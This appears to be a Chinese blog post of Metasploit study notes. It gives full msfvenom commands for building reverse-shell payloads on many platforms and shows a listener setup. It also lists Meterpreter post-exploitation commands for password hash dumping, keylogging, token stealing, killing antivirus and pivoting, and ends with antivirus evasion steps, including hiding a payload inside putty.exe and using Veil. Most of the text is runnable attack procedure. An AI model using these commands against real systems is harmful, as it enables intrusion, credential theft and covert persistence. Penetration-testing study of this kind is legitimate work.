Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。

0x01 基本操作

1、运行

Shell中直接输入msfconsole

2、建立搜索缓存(数据库)
启动PostgreSQL数据库服务 :service postgresql start 监听5432端口
初始化Metasploit数据库 :msfdb init
查看数据库联接情况 :msfconsole db_status
建立数据库缓存 :msfconsole db_rebuild_cache
3、专业术语
– Exploit,攻击工具/代码
– Payload,攻击载荷
– Shellcode – Module,模块
– Listener,监听器
4、Metasploit主目录
Kali Linux /usr/share/metasploit-framework
5、常用命令
show exploits – 查看所有可用的渗透攻击程序代码
show auxiliary – 查看所有可用的辅助攻击工具
show options – 查看该模块所有可用选项
show payloads – 查看该模块适用的所有载荷代码
show targets – 查看该模块适用的攻击目标类型
search – 根据关键字搜索某模块
info – 显示某模块的详细信息
use – 进入使用某渗透攻击模块
back – 回退 set/unset – 设置/禁用模块中的某个参数
setg/unsetg – 设置/禁用适用于所有模块的全局参数
save – 将当前设置值保存下来,以便下次启动MSF终端时仍可使用

0x02 Metasploit功能程序

msfvenom (攻击载荷生成和编码器)

  • 主要参数:-p payload-e 编码方式-i 编码次数-b 在生成的程序中避免出现的值LHOST,LPORT 监听上线的主机IP和端口-f exe 生成EXE格式使用msfvenom -l 可以查看可以利用payloadmsfvenom -l | grep windows | grep x64 | grep tcp 选择payload
1、生成可执行文件
Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Mac:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
PHP:
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
ASP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
JSP:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
WAR:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
Python:
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
Bash:
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
Perl:
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
2、监听
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false   让connection保持连接(即使一个连接退出,仍然保持listening状态)
exploit -j –z  -j(作为job开始运行)和-z(不立即进行session交换--也即是自动后台运行)
3、实例
msfvenom -p windows/x64/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=172.16.0.4 LPORT=443 -f exe > abc.exe

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > show options

msf exploit(handler) > set LHOST 172.16.0.4
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > exploit -j -z
-j(计划任务下进行攻击,后台) -z(攻击完成不遇会话交互)
msf exploit(handler) > jobs  查看后台攻击任务
msf exploit(handler) > kill <id>  停止某后台攻击任务
msf exploit(handler) > sessions -l  (查看会话)

msf exploit(handler) > sessions -i 2   选择会话
msf exploit(handler) > sessions -k 2   结束会话

Ctrl+z  把会话放到后台
Ctrl+c  结束会话

0x03 Meterpreter后攻击

Meterpreter提供的功能包括反追踪、纯内存工作模式、系统 信息获取、密码哈希导出、文件上传下载、屏幕截取、键盘记 录、权限提升、跳板攻击等等。

常用命令:
meterpreter > background  放回后台
meterpreter > exit  关闭会话
meterpreter > help  帮助信息
meterpreter > Sysinfo    系统平台信息
meterpreter > screenshot  屏幕截取
meterpreter > shell  命令行shell (exit退出)
meterpreter > getlwd  查看本地目录
meterpreter > lcd  切换本地目录
meterpreter > getwd  查看目录
meterpreter > ls 查看文件目录列表
meterpreter > cd  切换目录
meterpreter > rm  删除文件
meterpreter > download C:\\Users\\123\\Desktop\\1.txt 1.txt 下载文件
meterpreter > upload /var/www/wce.exe wce.exe  上传文件
meterpreter > search -d c:  -f *.doc  搜索文件
meterpreter > execute -f  cmd.exe -i   执行程序/命令
meterpreter > ps  查看进程
meterpreter > run post/windows/capture/keylog_recorder   键盘记录
meterpreter > getuid  查看当前用户权限
meterpreter > use priv  加载特权模块
meterpreter > getsystem  提升到SYSTEM权限
meterpreter > hashdump  导出密码散列
meterpreter > ps   查看高权限用户PID
meterpreter > steal_token <PID>  窃取令牌
meterpreter > rev2self  恢复原来的令牌
meterpreter > migrate pid  迁移进程
meterpreter > run killav  关闭杀毒软件
meterpreter > run getgui-e  启用远程桌面
meterpreter > portfwd add -l 1234 -p 3389 -r <目标IP>  端口转发
meterpreter > run get_local_subnets  获取内网网段信息
meterpreter > run autoroute -s <内网网段>  创建自动路由
meterpreter > run autoroute -p  查看自动路由表
创建代理通道:
msf > use auxiliary/server/socks4a   设置socks4代理模块
msf auxiliary(socks4a) > show options
msf auxiliary(socks4a) > run
配置proxychains参数:
nano /etc/proxychains.conf   修改代理监听端口,和前面端口一致
quite_mode  设置成安静模式:去掉如下参数前面的注释

0x04 免杀

1、多次编码免杀
msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.80.12 LPORT=443 -e x86/shikata_ga_nai-i5 -f exe -o /var/www/html/reverse_http_encode.exe
2、自定义二进制代码的文件模板免杀

使用“putty.exe”作为文件模板,而且随着putty程序运行而隐蔽同时运行,还使用编码器进行了编码。

msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.80.12 LPORT=443 -e x86/shikata_ga_nai-i5 -x ~/putty.exe -k -f exe -o /var/www/html/reverse_http_putty.exe
3、使用Veil生成免杀代码

下载地址:
https://github.com/Veil-Framework/Veil-Evasion (只集合了Evasion)
https://github.com/Veil-Framework/Veil
安装:(建议使用git下载,否则无法更新)

apt-get -y install git
git clone https://github.com/Veil-Framework/Veil.git
cd Veil/
cd setup
sudo ./setup.sh -c


  一路回车就行,可能中间或出现让你安装python、ruby、go语言等,默认安装就行


运行:

cd ~/Veil
./Veil.py


使用Veil-Evasion工具:
use Evasion


列举所有模块:
list

使用某个模块:

use
use c/meterpreter/rev_http.py


设置变量:
set

生成可执行代码:
generate

接着就是加载msf监听模块,等待用户的上线了。
  msf功能还是十分强大的,是渗透必备神器,可以自定义渗透脚本,更新速度也挺快,这里只是简单记录了他的用法,还有更大的能力等待着各位去开发和挖掘,这个笔记也会在后期慢慢更新,增加新的技能,未完待续。。

原文链接:http://zjw.dropsec.xyz/渗透/2018/05/10/Metasploit笔记.html

Metasploit笔记相关推荐

  1. Metasploit笔记(转)

    转自:https://blog.csdn.net/tan6600/article/details/46850057 一.名词解释 exploit 测试者利用它来攻击一个系统,程序,或服务,以获得开发者 ...

  2. Powershell tricks::Powershell Remoting

    DM_ · 2014/11/03 10:03 0x01 简介 Powershell Remoting建立在windows WinRM服务之上,可以一对一或一对多远程控制,也可以建立HTTP 或 HTT ...

  3. 使用Metasploit对MSSQL渗透测试步骤——学习笔记

    学习笔记 使用metasploit对MSSQL渗透测试方法(因为本人靶机没有mssql服务,所以只有方法hh) 第一步,使用mssql_ping获取信息 Name: MSSQL Ping Utilit ...

  4. ————《metasploit 魔鬼训练营》学习笔记序言

    Data 2017.12.27 Time 0:44 2017年底,我刚过20岁生日.12.18那天,自己在健康心理学论文和打py代码中度过. 12月份中旬,在py绝技中看到了metasploit这个东 ...

  5. 《Metasploit渗透测试魔鬼训练营》学习笔记

    Metasploit渗透测试魔鬼训练营学习笔记 法律常识 <中华人民共和国网络安全法>已由中华人民共和国第十二届全国人民代表大会常务委员会第二十四次会议于2016年11月7日通过,现予公布 ...

  6. 学习笔记-Metasploit

    Metasploit 注 : 笔记中拓扑图 xmind 源文件在其图片目录下 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 简介 Me ...

  7. Metasploit魔鬼训练营笔记

    提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一.什么是渗透测试 二.初识Metasploit 1.针对Metasploitable2上samba服务漏洞的小实验 ...

  8. windows opensshd 连接就close_基于Windows白名单执行Payload上线Metasploit 渗透红队笔记...

    渗透攻击红队 一个专注于红队攻击的公众号 大家好,这里是 渗透攻击红队 的第 17 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深), 不出意外每天一更 基于白名单绕过 测试环境 攻击机 ...

  9. 《metasploit渗透测试魔鬼训练营》学习笔记第九章--meterpreter

    七.强大的meterpreter   7.1再探metasploit的攻击载荷模块      7.1.1典型的攻击载荷模块      metasploit涵盖了各大主流操作系统和平台,其中绝大部分是远 ...

最新文章

  1. a和a数值大小 计算机,Java求s=a+aa+aaa+aaaa+aa...a的值
  2. 图论 ---- Codeforces Round #649 (Div. 2)D题[dfs求环+深度分层求图中独立集]
  3. Linux 网络编程(TCP)
  4. 曼哈顿距离,欧式距离,明式距离,切比雪夫距离,汉明距离
  5. oracle+监控索引使用,ORACLE 监控索引的使用
  6. 1.5 matlab常量与变量
  7. linux odbc 数据源测试,linux操作系统配置ODBC数据源
  8. 使用Injection Token将字符串类型的参数注入到类的构造函数里
  9. Prism源代码解析(IRegionManager)
  10. mysql导入数据显示进度条_导入数据思路+进度条
  11. android管理员和普通用户登录,asp登录页如何区别管理员和普通用户,登录后跳转到不同页面?...
  12. SAP GUI 710 PATCH 12 下载地址
  13. 仅需6步!虹科教你如何在第三方软件CODESYS中配置PCAN
  14. 计算机用户名显示TEMP,Windows 下Temp帐号处理
  15. 论文解读 | 百度 ERNIE: Enhanced Representation through Knowledge Integration
  16. 易福门电感式接近开关IGS200
  17. 电阻、电容及电感的高频等效电路及特性曲线
  18. U-Boot参数设置
  19. Linux Shell 基础语法 流程控制 逻辑运算 字符串操作详细解析
  20. 废旧计算机主板,废旧笔记本, 千万别扔掉, 教你变废为宝

热门文章

  1. 计算机控制分离性原理是什么,什么是分离性原理   该原理有何指导意义
  2. python遍历循环和无限循环结构_Python通过for、while等保留字提供遍历循环和无限循环结构...
  3. 关于EAS辅助帐横表的问题
  4. float子元素超出父元素解决办法
  5. linux sed 倒数,文本处理工具之sed
  6. 1. stm32 mcu简介
  7. 阿里的职级划分 ---- P8是什么概念
  8. MySQL OCP888题解007-validate_password_policy(密码验证策略)
  9. Blender Python API中文介绍文档四
  10. 服务化框架技术选型实践